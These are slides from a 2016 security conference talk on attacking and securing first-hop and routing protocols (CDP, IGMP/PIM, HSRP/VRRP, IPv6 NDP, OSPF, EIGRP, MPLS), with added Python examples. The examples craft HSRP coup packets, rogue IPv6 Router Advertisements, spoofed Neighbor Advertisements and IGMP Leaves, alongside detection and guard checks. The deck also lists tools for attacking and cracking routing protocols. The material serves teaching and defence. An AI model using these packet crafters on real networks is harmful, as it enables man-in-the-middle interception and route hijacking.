Exploiting First Hop Protocols to Own the Network
BSides Vienna 2016
Paul Coggin @PaulCoggin
OSI and TCP/IP Model
(figure: the OSI layers 7 Application, 6 Presentation, 5 Session, 4 Transport, 3 Network, 2 Data Link, 1 Physical beside the TCP/IP layers Application, Transport, Internet, Network Interface; the "Own the Network" callout sits at the Data Link layer / frame header, which is where the first hop protocols in this talk live)
Cisco Discovery Protocol (CDP)
- Great tool for mapping out a network during an audit
- Be sure to disable it on connections to external networks such as WAN and Metro Ethernet links
- VoIP phones use CDP (how do you contain the information leakage on the VoIP network?)
Cisco Discovery Protocol (CDP) – Great for Recon!
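The recon slides above do not show the frame format. The following is an added example (not code from the talk or its author) that builds a CDPv2 payload and dissects its TLVs with the Python standard library only, so it runs without Scapy or a capture file. Every value in it (device name, port, platform, IOS version string, management address, native VLAN) is constructed for the example; the checksum routine is the plain RFC 1071 sum, which matches real Cisco devices only for even-length payloads.

```python
# Added example (not from the talk): build and dissect a CDPv2 payload to show
# what CDP leaks to anyone on the segment. All names, addresses and version
# strings below are constructed for this example.
import struct
from ipaddress import IPv4Address

# CDP TLV type codes
TLV_DEVICE_ID, TLV_ADDRESSES, TLV_PORT_ID, TLV_CAPABILITIES = 0x0001, 0x0002, 0x0003, 0x0004
TLV_SW_VERSION, TLV_PLATFORM, TLV_NATIVE_VLAN = 0x0005, 0x0006, 0x000A
TEXT_TLVS = {TLV_DEVICE_ID: "device_id", TLV_PORT_ID: "port_id",
             TLV_SW_VERSION: "sw_version", TLV_PLATFORM: "platform"}
CAPABILITY_BITS = {0x01: "Router", 0x02: "TB Bridge", 0x04: "SR Bridge", 0x08: "Switch",
                   0x10: "Host", 0x20: "IGMP", 0x40: "Repeater"}


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum. Real Cisco code treats a trailing
    odd byte differently; this example only needs to be self-consistent."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tlv(tlv_type: int, value: bytes) -> bytes:
    """CDP TLV: 2-byte type, 2-byte length (including this 4-byte header), value."""
    return struct.pack("!HH", tlv_type, 4 + len(value)) + value


def build_cdp(device_id, port_id, platform, sw_version, mgmt_ip, native_vlan, capabilities=0x28):
    """Serialize a CDPv2 payload (what follows the LLC/SNAP header on the wire)."""
    # Address TLV: count, then per address: proto type 1 (NLPID), proto len, 0xCC = IPv4, addr len, addr
    addresses = (struct.pack("!I", 1) + bytes([0x01, 0x01, 0xCC])
                 + struct.pack("!H", 4) + IPv4Address(mgmt_ip).packed)
    body = (tlv(TLV_DEVICE_ID, device_id.encode())
            + tlv(TLV_ADDRESSES, addresses)
            + tlv(TLV_PORT_ID, port_id.encode())
            + tlv(TLV_CAPABILITIES, struct.pack("!I", capabilities))
            + tlv(TLV_SW_VERSION, sw_version.encode())
            + tlv(TLV_PLATFORM, platform.encode())
            + tlv(TLV_NATIVE_VLAN, struct.pack("!H", native_vlan)))
    header = struct.pack("!BBH", 2, 180, 0)        # version 2, TTL 180 s, checksum placeholder
    checksum = internet_checksum(header + body)
    return struct.pack("!BBH", 2, 180, checksum) + body


def parse_cdp(payload: bytes) -> dict:
    """Walk the TLVs and return the fields an attacker harvests for recon."""
    if len(payload) < 4 or internet_checksum(payload) != 0:
        raise ValueError("bad CDP checksum or truncated payload")
    version, ttl, _ = struct.unpack("!BBH", payload[:4])
    info = {"version": version, "ttl": ttl}
    offset = 4
    while offset + 4 <= len(payload):
        tlv_type, tlv_len = struct.unpack("!HH", payload[offset:offset + 4])
        if tlv_len < 4 or offset + tlv_len > len(payload):
            raise ValueError("malformed TLV at offset %d" % offset)
        value = payload[offset + 4:offset + tlv_len]
        if tlv_type in TEXT_TLVS:
            info[TEXT_TLVS[tlv_type]] = value.decode(errors="replace")
        elif tlv_type == TLV_ADDRESSES:
            count, pos, addrs = struct.unpack("!I", value[:4])[0], 4, []
            for _ in range(count):
                proto_len = value[pos + 1]
                proto = value[pos + 2:pos + 2 + proto_len]
                addr_len = struct.unpack("!H", value[pos + 2 + proto_len:pos + 4 + proto_len])[0]
                raw = value[pos + 4 + proto_len:pos + 4 + proto_len + addr_len]
                if proto == b"\xcc" and addr_len == 4:     # only IPv4 decoded here
                    addrs.append(str(IPv4Address(raw)))
                pos += 4 + proto_len + addr_len
            info["addresses"] = addrs
        elif tlv_type == TLV_CAPABILITIES:
            caps = struct.unpack("!I", value)[0]
            info["capabilities"] = [name for bit, name in CAPABILITY_BITS.items() if caps & bit]
        elif tlv_type == TLV_NATIVE_VLAN:
            info["native_vlan"] = struct.unpack("!H", value)[0]
        offset += tlv_len
    return info


# Constructed sample: a distribution switch advertising itself on an access port.
SAMPLE_CDP = build_cdp("dist-sw1", "GigabitEthernet1/0/24", "cisco WS-C3750G-24TS",
                       "Cisco IOS Software, C3750 Software, Version 12.2(55)SE10",
                       "10.10.0.2", native_vlan=100)

if __name__ == "__main__":
    for key, val in parse_cdp(SAMPLE_CDP).items():
        print("%-13s %s" % (key, val))
```

Everything `parse_cdp` returns (hostname, uplink port, platform, exact IOS train, management address, native VLAN) is what you use to pick a target and a matching exploit, which is why the slide says to disable CDP on external-facing ports; on a real capture the payload starts after the SNAP header (OUI 00:00:0c, protocol 0x2000).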
Multicast Overview
- Multicast uses UDP: a one-way "fire and forget" traffic stream
- Applications: video and many others
- Multicast routing: PIM, with Reverse Path Forwarding (RPF) checks
- Group membership signalling: IGMP for IPv4, MLD for IPv6
- Routers send periodic membership queries per VLAN
- Hosts send group reports to join (IGMP Report to Join Multicast Group)
- Hosts may send leave messages
(figure: Multicast Source 1 and Source 2 feeding a PIM routing cloud; receivers Member 1 and Member 2 on the leaf segments each answer with an IGMP Report)
Multicast - IGMP
Multicast Routing - PIM
Attacking Multicast
Craft IGMP/MLD packets on the local VLAN segment (Scapy, Colasoft Packet Builder):
- IGMP Leaves
- IGMP Queries
- Spoofed IGMP source
Craft router PIM packets (Scapy, Colasoft Packet Builder; GNS3 or Quagga can add a rogue PIM router to the segment):
- Multicast PIM packets: Hello, Join/Prune, Assert
- Unicast PIM packets: Register, Register-Stop, C-RP-Advertisement
(figure: Multicast Source 1 and Source 2, PIM routing cloud, three receivers)
Securing Multicast
- Multicast storm control on switches
- L2 port security
- Control Plane Policing (CoPP)
- Modular Quality of Service
- PIM neighbor filter (an ACL alone may be defeated by spoofing; multicast L2 spoof protection is also needed)
- RP announce filter
- Multicast boundary filter
- L3 switch aggregation
- Secure the multicast control protocol trust relationships
(figure: Multicast Source 1 and Source 2, PIM routing cloud, three receivers)
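The attack and defence slides above list IGMP Leaves, Queries and spoofed sources without showing the messages. The following is an added example (not code from the talk or its author) that crafts IGMPv2 messages and runs a small snooping-style audit over them, standard library only. Ports, host addresses and the group are constructed; the audit logic mirrors what IGMP snooping with a configured mrouter port can catch and is this example's own, not a vendor feature.

```python
# Added example (not from the talk): craft IGMPv2 messages and run a small
# snooping-style audit over them. IGMP carries no authentication, so an
# 8-byte message with a valid checksum is all a rogue host needs. Ports,
# addresses and groups below are constructed for this example.
import struct
from ipaddress import IPv4Address

IGMP_QUERY, IGMP_V1_REPORT, IGMP_V2_REPORT, IGMP_LEAVE = 0x11, 0x12, 0x16, 0x17
ALL_HOSTS, ALL_ROUTERS = "224.0.0.1", "224.0.0.2"   # query and leave destinations


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the IGMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_igmp(msg_type: int, group: str = "0.0.0.0", max_resp: int = 100) -> bytes:
    """8-byte IGMPv2 message. max_resp (tenths of a second) is only carried in
    queries; group is 0.0.0.0 for a general query."""
    mrt = max_resp if msg_type == IGMP_QUERY else 0
    raw = struct.pack("!BBH", msg_type, mrt, 0) + IPv4Address(group).packed
    return raw[:2] + struct.pack("!H", internet_checksum(raw)) + raw[4:]


def parse_igmp(data: bytes) -> dict:
    if len(data) < 8 or internet_checksum(data[:8]) != 0:
        raise ValueError("bad IGMP checksum or truncated message")
    msg_type, max_resp, _, group = struct.unpack("!BBH4s", data[:8])
    return {"type": msg_type, "max_resp": max_resp, "group": str(IPv4Address(group))}


class IgmpSnooper:
    """Tracks membership per switch port the way IGMP snooping does and flags
    the two spoofing patterns from the attack slide: a querier on a host
    port, and a Leave for a group the sending port never joined."""

    def __init__(self, mrouter_ports):
        self.mrouter_ports = set(mrouter_ports)   # ports facing the real querier / PIM router
        self.members = {}                         # group -> {port: reporting host IP}
        self.alerts = []

    def observe(self, port: str, src_ip: str, payload: bytes) -> dict:
        msg = parse_igmp(payload)
        if msg["type"] == IGMP_QUERY:
            if port not in self.mrouter_ports:
                # a query with a low source IP from a host port wins querier election
                self.alerts.append("rogue querier %s on host port %s" % (src_ip, port))
        elif msg["type"] in (IGMP_V1_REPORT, IGMP_V2_REPORT):
            self.members.setdefault(msg["group"], {})[port] = src_ip
        elif msg["type"] == IGMP_LEAVE:
            joined = self.members.get(msg["group"], {})
            if port not in joined:
                self.alerts.append("leave for %s from %s on port %s, which never joined"
                                   % (msg["group"], src_ip, port))
            elif joined[port] != src_ip:
                self.alerts.append("leave for %s on port %s spoofs %s (joined as %s)"
                                   % (msg["group"], port, src_ip, joined[port]))
            else:
                del joined[port]
        return msg


def demo() -> list:
    """Constructed sequence: legitimate querier and receiver, then a rogue host
    on Gi1/0/24 spoofing the receiver's Leave and trying to become querier."""
    snoop = IgmpSnooper(mrouter_ports={"Gi1/0/48"})
    snoop.observe("Gi1/0/48", "10.1.1.1", build_igmp(IGMP_QUERY))
    snoop.observe("Gi1/0/5", "10.1.1.20", build_igmp(IGMP_V2_REPORT, "239.1.1.1"))
    snoop.observe("Gi1/0/24", "10.1.1.20", build_igmp(IGMP_LEAVE, "239.1.1.1"))  # spoofed source
    snoop.observe("Gi1/0/24", "10.1.1.2", build_igmp(IGMP_QUERY))               # rogue querier
    return snoop.alerts


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

To put these on the wire the message goes in an IPv4 packet with TTL 1 and the Router Alert option, destination 224.0.0.1 for queries and 224.0.0.2 for leaves; that is the part Scapy or Colasoft handles for you. The port-based checks are exactly why the slide pairs the PIM neighbor filter with L2 spoof protection: the ACL sees a source address, the switch sees which port it came from.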
First Hop Redundancy Protocols
- Multicast protocol; priority elects the role
- Authentication: MD5, clear text, or none
Protocols:
- Hot Standby Router Protocol (HSRP)
- Virtual Router Redundancy Protocol (VRRP)
- Gateway Load Balancing Protocol (GLBP)
Hacking tools: GNS3, Scapy, Colasoft Packet Builder, many others (remember to enable IP forwarding on the rogue host)
(figure: Backup router 192.168.1.2, Active router 192.168.1.1, Virtual router 192.168.1.3, host 192.168.1.50, and a Rogue Insider on the same segment)
VRRP – No Authentication
VRRP – Clear Text Authentication
HSRP MITM – Packet Analysis
- HSRP password visible in clear text in the capture
FHRP – Crafted HSRP Packets
- The rogue insider sends a crafted HSRP coup packet with a higher priority to the routers
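The HSRP slides above show the clear-text password in a capture and the coup packet that follows. The following is an added example (not code from the talk or its author) that builds and dissects HSRPv1 (RFC 2281) with the standard library, derives the coup from a sniffed Hello the way the rogue insider would, and adds the sensor check a defender would run over the same multicast traffic. Router addresses, priorities, the group number and the password are constructed for the example; the audit function is this example's own logic, not a vendor feature.

```python
# Added example (not from the talk): build and dissect HSRPv1 (RFC 2281,
# UDP/1985 to 224.0.0.2). It shows the 8-byte clear-text authentication field
# every host on the VLAN can read, the coup a rogue insider crafts from a
# sniffed Hello, and a sensor check that flags it. Addresses, priorities and
# the password are constructed for this example.
import struct
from ipaddress import IPv4Address

HSRP_PORT, HSRP_DST = 1985, "224.0.0.2"
OP_HELLO, OP_COUP, OP_RESIGN = 0, 1, 2
OPCODES = {OP_HELLO: "Hello", OP_COUP: "Coup", OP_RESIGN: "Resign"}
STATES = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}
STATE_STANDBY, STATE_ACTIVE = 8, 16
# version, opcode, state, hellotime, holdtime, priority, group, reserved, auth, virtual IP
HSRP_FMT = "!BBBBBBBB8s4s"


def build_hsrp(opcode, state, priority, group, virtual_ip, auth="cisco", hellotime=3, holdtime=10):
    """Serialize one 20-byte HSRPv1 message. The auth string goes on the wire
    verbatim (default "cisco"); HSRPv1 does no hashing."""
    auth_field = auth.encode()[:8].ljust(8, b"\x00")
    return struct.pack(HSRP_FMT, 0, opcode, state, hellotime, holdtime, priority,
                       group, 0, auth_field, IPv4Address(virtual_ip).packed)


def parse_hsrp(data: bytes) -> dict:
    if len(data) < 20:
        raise ValueError("truncated HSRP message")
    version, opcode, state, hello, hold, prio, group, _, auth, vip = struct.unpack(HSRP_FMT, data[:20])
    if version != 0:
        raise ValueError("not HSRPv1 (version %d)" % version)
    return {"opcode": OPCODES.get(opcode, opcode), "state": STATES.get(state, state),
            "hellotime": hello, "holdtime": hold, "priority": prio, "group": group,
            "auth": auth.rstrip(b"\x00").decode(errors="replace"),   # the clear-text password
            "virtual_ip": str(IPv4Address(vip))}


def takeover_coup(sniffed_hello: bytes, rogue_priority: int = 255) -> bytes:
    """What the rogue insider sends after sniffing the active router's Hello:
    same group, virtual IP and password, higher priority, state Active.
    The rogue host must also enable IP forwarding to keep victims' traffic flowing."""
    h = parse_hsrp(sniffed_hello)
    if rogue_priority <= h["priority"]:
        raise ValueError("priority %d does not beat the active router's %d"
                         % (rogue_priority, h["priority"]))
    return build_hsrp(OP_COUP, STATE_ACTIVE, rogue_priority, h["group"], h["virtual_ip"],
                      h["auth"], h["hellotime"], h["holdtime"])


def audit_hsrp(observations, trusted) -> list:
    """Sensor logic over (src_ip, payload) pairs sniffed from 224.0.0.2:1985.
    trusted maps group -> {router IP: configured priority}. Anything from an
    unlisted source, or a priority other than the configured one, is an alert."""
    alerts = []
    for src_ip, payload in observations:
        msg = parse_hsrp(payload)
        routers = trusted.get(msg["group"], {})
        if src_ip not in routers:
            alerts.append("%s from untrusted %s for group %d (priority %d, state %s)"
                          % (msg["opcode"], src_ip, msg["group"], msg["priority"], msg["state"]))
        elif msg["priority"] != routers[src_ip]:
            alerts.append("%s announces priority %d, configured %d"
                          % (src_ip, msg["priority"], routers[src_ip]))
    return alerts


# Constructed segment: active 192.168.1.1 (priority 110), standby 192.168.1.2 (100),
# virtual gateway 192.168.1.3, rogue insider at 192.168.1.50.
ACTIVE_HELLO = build_hsrp(OP_HELLO, STATE_ACTIVE, 110, 1, "192.168.1.3", auth="cisco")
STANDBY_HELLO = build_hsrp(OP_HELLO, STATE_STANDBY, 100, 1, "192.168.1.3", auth="cisco")
TRUSTED = {1: {"192.168.1.1": 110, "192.168.1.2": 100}}


def demo() -> list:
    coup = takeover_coup(ACTIVE_HELLO)
    return audit_hsrp([("192.168.1.1", ACTIVE_HELLO), ("192.168.1.2", STANDBY_HELLO),
                       ("192.168.1.50", coup)], TRUSTED)


if __name__ == "__main__":
    print("sniffed password:", parse_hsrp(ACTIVE_HELLO)["auth"])
    print("coup bytes:", takeover_coup(ACTIVE_HELLO).hex())
    for line in demo():
        print("ALERT:", line)
```

On the wire the 20 bytes ride in UDP 1985, source port 1985, destination 224.0.0.2 with TTL 1, which is the part Scapy or Colasoft fills in. The fix is not a better password: MD5 authentication stops the coup only if the key is not guessable, and the sensor rule (an FHRP speaker you did not configure) catches the attack regardless of the authentication mode.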
IPv6 Neighbor Discovery Protocol
- Filter on "ipv6" or Ethernet type 0x86DD to identify IPv6 packets
- IPv6 uses multicast; there is no broadcast
IPv6 SLAAC MITM
IPv6 Neighbor Discovery Protocol (NDP) – think ARP for IPv6
- By default Windows, Mac and Linux hosts send ICMPv6 Router Solicitations and configure themselves from whatever Router Advertisement answers
- A rogue insider sending RAs becomes the man-in-the-middle
Mitigations:
- RA Guard
- 802.1X
- Private VLANs
- IPv6 port security
- Source/Destination Guard
- SeND (cryptographically authenticates NDP; it does not encrypt it)
IPv6 MITM tools: Chiron, Evil FOCA, THC parasite6, Scapy, Colasoft Packet Builder
IPv6 Neighbor Discovery Spoofing – MITM
- The ARP spoofing equivalent for IPv6: a rogue insider answers Neighbor Discovery for Windows, Mac and Linux victims
Mitigations:
- Source/Destination Guard
- 802.1X
- Private VLANs
- IPv6 port security
- DHCP snooping
- SeND (cryptographically authenticates NDP; it does not encrypt it)
IPv6 MITM tools: Chiron, Evil FOCA, THC parasite6, Scapy, Colasoft Packet Builder
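The three IPv6 slides above give the filter (EtherType 0x86DD), the rogue RA attack, the NDP spoofing attack and the mitigations, but not the packets. The following is an added example (not code from the talk or its author) that builds a Router Advertisement and an unsolicited Neighbor Advertisement over raw Ethernet with the standard library, then applies the checks a switch running RA Guard and ND inspection applies. MACs, link-local and global addresses, prefixes and port names are constructed; the guard function is this example's own logic, modelled on those features, not vendor code.

```python
# Added example (not from the talk): build ICMPv6 Router Advertisements and
# Neighbor Advertisements over raw Ethernet, then apply the checks a switch
# running RA Guard / ND inspection applies: EtherType 0x86DD, hop limit 255,
# RAs only from router ports, NAs consistent with the binding table. MACs,
# addresses, prefixes and port names are constructed for this example.
import struct
from ipaddress import IPv6Address

ETHERTYPE_IPV6, IPPROTO_ICMPV6 = 0x86DD, 58
ICMPV6_RS, ICMPV6_RA, ICMPV6_NS, ICMPV6_NA = 133, 134, 135, 136
OPT_SRC_LLADDR, OPT_TGT_LLADDR, OPT_PREFIX_INFO = 1, 2, 3
ALL_NODES, ALL_NODES_MAC = IPv6Address("ff02::1"), "33:33:00:00:00:01"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)


def icmpv6_checksum(src, dst, msg: bytes) -> int:
    """Pseudo-header (src, dst, upper-layer length, next header) plus the message."""
    data = src.packed + dst.packed + struct.pack("!I3xB", len(msg), IPPROTO_ICMPV6) + msg
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv6_frame(src_mac, dst_mac, src, dst, icmp: bytes) -> bytes:
    """Ethernet + IPv6 (hop limit 255, as NDP requires) around an ICMPv6
    message whose checksum bytes [2:4] are still zero."""
    icmp = icmp[:2] + struct.pack("!H", icmpv6_checksum(src, dst, icmp)) + icmp[4:]
    ip6 = struct.pack("!IHBB", 0x60000000, len(icmp), IPPROTO_ICMPV6, 255) + src.packed + dst.packed
    return mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETHERTYPE_IPV6) + ip6 + icmp


def build_ra(src_mac, src_ll, prefix, plen=64, router_lifetime=1800) -> bytes:
    """Unsolicited RA to ff02::1 with source link-layer and prefix (L+A) options."""
    msg = struct.pack("!BBHBBHII", ICMPV6_RA, 0, 0, 64, 0, router_lifetime, 0, 0)
    msg += struct.pack("!BB", OPT_SRC_LLADDR, 1) + mac_bytes(src_mac)
    msg += (struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, plen, 0xC0, 2592000, 604800, 0)
            + IPv6Address(prefix).packed)
    return ipv6_frame(src_mac, ALL_NODES_MAC, IPv6Address(src_ll), ALL_NODES, msg)


def build_na(src_mac, src_ll, target, override=True) -> bytes:
    """Unsolicited NA claiming `target` lives at src_mac: the IPv6 ARP-poisoning move."""
    msg = struct.pack("!BBHB3x", ICMPV6_NA, 0, 0, 0x20 if override else 0) + IPv6Address(target).packed
    msg += struct.pack("!BB", OPT_TGT_LLADDR, 1) + mac_bytes(src_mac)
    return ipv6_frame(src_mac, ALL_NODES_MAC, IPv6Address(src_ll), ALL_NODES, msg)


def parse_ndp(frame: bytes):
    """None for anything that is not ICMPv6; otherwise the fields the guard needs."""
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV6:   # the "ethernet type 0x86DD" filter
        return None
    _, plen, next_hdr, hop_limit = struct.unpack("!IHBB", frame[14:22])
    src, dst = IPv6Address(frame[22:38]), IPv6Address(frame[38:54])
    if next_hdr != IPPROTO_ICMPV6:
        return None
    icmp = frame[54:54 + plen]
    if icmpv6_checksum(src, dst, icmp) != 0:
        raise ValueError("bad ICMPv6 checksum")
    itype = icmp[0]
    hdr_len = 16 if itype == ICMPV6_RA else 24 if itype in (ICMPV6_NS, ICMPV6_NA) else 8
    opts, pos = {}, hdr_len
    while pos + 2 <= len(icmp):
        otype, olen = icmp[pos], icmp[pos + 1] * 8
        if olen == 0:
            raise ValueError("zero-length NDP option")       # RFC 4861: must be discarded
        body = icmp[pos + 2:pos + olen]
        if otype in (OPT_SRC_LLADDR, OPT_TGT_LLADDR):
            opts[otype] = mac_str(body[:6])
        elif otype == OPT_PREFIX_INFO:
            opts[otype] = "%s/%d" % (IPv6Address(body[14:30]), body[0])
        pos += olen
    info = {"type": itype, "src_mac": mac_str(frame[6:12]), "src": str(src),
            "hop_limit": hop_limit, "opts": opts}
    if itype in (ICMPV6_NS, ICMPV6_NA):
        info["target"] = str(IPv6Address(icmp[8:24]))
    return info


def ndp_guard(frame: bytes, ingress_port: str, router_ports, bindings) -> tuple:
    """Accept/drop decision. router_ports: ports allowed to originate RAs;
    bindings: IPv6 address -> MAC learned by ND / DHCPv6 snooping."""
    info = parse_ndp(frame)
    if info is None:
        return "accept", "not ICMPv6"
    if info["type"] in (ICMPV6_RS, ICMPV6_RA, ICMPV6_NS, ICMPV6_NA) and info["hop_limit"] != 255:
        return "drop", "NDP with hop limit %d (not link-local)" % info["hop_limit"]
    if info["type"] == ICMPV6_RA and ingress_port not in router_ports:
        return "drop", "RA from %s on host port %s" % (info["src_mac"], ingress_port)
    if info["type"] == ICMPV6_NA:
        bound, claimed = bindings.get(info["target"]), info["opts"].get(OPT_TGT_LLADDR)
        if bound and claimed and claimed != bound:
            return "drop", "NA binds %s to %s, table says %s" % (info["target"], claimed, bound)
    return "accept", "ok"
```

Two caveats a practitioner should keep in mind: RA Guard as implemented here (and on most switches) inspects only the first header, so an RA hidden behind IPv6 extension headers or split across fragments slips past unless the switch also drops those on host ports; and the NA check is only as good as the binding table, which is why the slides pair it with 802.1X, port security and DHCPv6 snooping.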
OSPF – No Authentication
OSPF – Clear Text Authentication
Hack the Network via OSPF
- OSPF is typically implemented without any thought to security
- Without MD5, LSAs are multicast on the spoke LAN for any user to sniff
OSPF attack vectors:
- Take over as DR
- Inject routes to mask the source of an attack
- DoS
- Inject routes for MITM
- Add new routes to a hacked router
- Change interface bandwidth or use "ip ospf cost" for traffic engineering on a hacked router
OSPF exploit tools:
- Quagga
- NRL CORE (network simulator)
- Nemesis
- Loki
- GNS3/Dynamips
- Buy a router on eBay
- Hack a router and reconfigure it
- Code one with Scapy
- IP Sorcery (IP Magic)
- Cain & Abel to crack OSPF MD5
- MS RRAS
- NetDude
- Colasoft
- Phenoelit IRPAS
(figure: an autonomous system with Area 0, Area 1 and Area 2; an Area Border Router (ABR) between areas, an Autonomous System Border Router (ASBR) to an external network running BGP, EIGRP or IS-IS, and the DR and BDR on a segment)
EIGRP – No Authentication
(figure: network 10.1.2.0 255.255.255.0)
Hack the Network via EIGRP
- Similar to OSPF, EIGRP is typically implemented without any thought to security
- Network administrators should use authentication and configure interfaces that have no EIGRP neighbors as passive
EIGRP attack vectors:
- Inject routes to mask the source of an attack
- DoS
- Inject routes for MITM
- Add new routes to a hacked router
- Change interface bandwidth for traffic engineering on a hacked router
EIGRP exploit tools:
- GNS3/Dynamips
- Buy a router on eBay
- Hack a router and reconfigure it
- Phenoelit IRPAS
(figure: networks 10.1.1.0 255.255.255.0, 10.1.2.0 255.255.255.0 and 192.168.1.0 255.255.255.0)
DMZ Layer 2 Security
DMZ trusts:
- Typically a single VLAN
- Open trusts
- DMZ to internal Active Directory integration
- *NIX hosts with NIS (AD-integrated)
- Pivot from the DMZ to the internal network
Secure DMZ:
- PVLANs
- VACLs
- Separate virtual or physical interfaces with ACLs
- Develop a network traffic matrix to define the required network traffic flows
(figure: Internet, an Inside VLAN, DMZ hosts WWW, DNS, SMTP and SharePoint, and an internal network with Database, Email, DNS and Active Directory)
Layer 2 – Secure Visualization and Instrumentation
In-band monitoring:
- EPC (Embedded Packet Capture)
- SPAN, RSPAN, ERSPAN
- NetFlow
- TAP/sniffer
Out-of-band network to the NOC/SOC
- Whitelist the Layer 2 network trust relationships
- Whitelist trusted information flows in monitoring
- Secure the control, management and data planes
References
- Developing IP Multicast Networks, Vol 1 – Beau Williamson
- LAN Switch Security – What Hackers Know About Your Switches, Eric Vyncke, Christopher Paggen, Cisco Press
- Enno Rey – @Enno_Insinuator, @WEareTROOPERS, ERNW papers and resources, www.ernw.de, www.insinuator.net
- Ivan Pepelnjak – @IOShints, papers and resources, http://www.ipspace.net
- IPv6 Security, Scott Hogg and Eric Vyncke, Cisco Press
- http://www.gtri.com/wp-content/uploads/2014/10/IPv6-Hacker-Halted-The-Hacker-Code-Angels-vs-Demons.pdf
- The Practice of Network Security Monitoring, Richard Bejtlich, No Starch Press
- Router Security Strategies: Securing IP Network Traffic Planes, Gregg Schudel, David J. Smith, Cisco Press
- https://www.cisco.com/go/safe
- http://docwiki.cisco.com/wiki/FHS
- http://www.netoptics.com/blog/01-07-2011/sample-pcap-files
- http://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipapp_frp/configuration/12-4/fp-12-4-book.html
- http://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Security/Baseline_Security/securebasebook/sec_chap8.html
- http://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst6500/ios/12-2SX/best/practices/recommendations.html
- http://www.cisco.com/web/about/security/intelligence/ipv6_first_hop.html
- http://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-21.html
- http://monkey.org/~dugsong/dsniff/
- https://www.yersinia.net
- https://www.nsa.gov/ia/_files/factsheets/Factsheet-Cisco%20Port%20Security.pdf
- http://iase.disa.mil/stigs/net_perimeter/network-infrastructure/Pages/index.aspx
- http://www.cisco.com/c/en/us/about/security-center/multicast-toolkit.html
Questions? @PaulCoggin
OSPF – MD5 Authentication
EIGRP – MD5 Authentication
(figure: network 10.1.2.0 255.255.255.0)
MPLS Architecture Overview
- P routers (LSRs) are in the core of the MPLS cloud
- PE routers (edge LSRs or LERs) use MPLS with the core and plain IP with the CE routers
- P and PE routers share a common IGP
- PE routers are fully meshed with MP-iBGP sessions
- The service provider may accidentally or intentionally misconfigure the VPNs
- Run an IPsec VPN over the MPLS VPN to ensure security
(figure: VPN_A and VPN_B customer sites (10.1.0.0, 10.2.0.0, 10.3.0.0, 11.5.0.0, 11.6.0.0) attached through CE routers to PE routers around a core of P routers, with iBGP sessions between the PEs)
MPLS Label PCAP – Service Provider Core
- CPE-to-CPE Telnet over the service provider's MPLS VPN
32-bit MPLS label format:
- Label: 20 bits
- EXP: 3 bits
- Bottom-of-Stack: 1 bit
- TTL: 8 bits
Telnet Username/Password – Clear Text Encapsulated in the MPLS VPN
- A separate overlay encrypted VPN is required to secure your traffic
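The two MPLS slides above give the label format and show a Telnet login readable inside the VPN. The following is an added example (not code from the talk or its author) that walks a label stack down to the customer's TCP payload with the standard library, which is what a sniffer on a P-router link does. The frame, labels, customer addresses and the login text are constructed; IP and TCP checksums are left at zero because reading the payload does not need them.

```python
# Added example (not from the talk): walk an MPLS label stack down to the
# customer's TCP payload. The frame, labels, addresses and login text are
# constructed; it shows that a label only encapsulates, so a Telnet session
# inside an MPLS VPN is as readable to anyone on the provider core as on a
# LAN, which is why a separate encrypted overlay VPN is needed.
import struct
from ipaddress import IPv4Address


def mpls_entry(label: int, exp: int = 0, bos: int = 0, ttl: int = 64) -> bytes:
    """One 32-bit label stack entry: label (20) | EXP (3) | S (1) | TTL (8)."""
    return struct.pack("!I", (label << 12) | (exp << 9) | (bos << 8) | ttl)


def parse_mpls_stack(data: bytes):
    """Return ([(label, exp, bos, ttl), ...], offset of the first byte after the stack)."""
    stack, offset = [], 0
    while True:
        if offset + 4 > len(data):
            raise ValueError("label stack has no bottom-of-stack entry")
        word = struct.unpack("!I", data[offset:offset + 4])[0]
        entry = (word >> 12, (word >> 9) & 0x7, (word >> 8) & 0x1, word & 0xFF)
        stack.append(entry)
        offset += 4
        if entry[2]:                     # S bit set: last label, payload follows
            return stack, offset


def build_ipv4_tcp(src, dst, sport, dport, payload, seq=1, flags=0x18):
    """Minimal IPv4 + TCP (PSH/ACK) segment. Checksums are left zero: they are
    not needed to read the payload, which is the point being made."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, 6, 0,
                     IPv4Address(src).packed, IPv4Address(dst).packed)
    return ip + tcp


def decode_mpls_frame(data: bytes) -> dict:
    """Strip the label stack, then the IPv4 and TCP headers, and return what a
    sniffer on a P-router link sees."""
    stack, offset = parse_mpls_stack(data)
    ip = data[offset:]
    if ip[0] >> 4 != 4:
        raise ValueError("payload under bottom of stack is not IPv4")
    ihl = (ip[0] & 0xF) * 4
    info = {"labels": [e[0] for e in stack], "transport_label": stack[0][0],
            "vpn_label": stack[-1][0], "src": str(IPv4Address(ip[12:16])),
            "dst": str(IPv4Address(ip[16:20])), "proto": ip[9]}
    if ip[9] == 6:
        sport, dport = struct.unpack("!HH", ip[ihl:ihl + 4])
        data_offset = (ip[ihl + 12] >> 4) * 4
        info.update(sport=sport, dport=dport, payload=ip[ihl + data_offset:])
    return info


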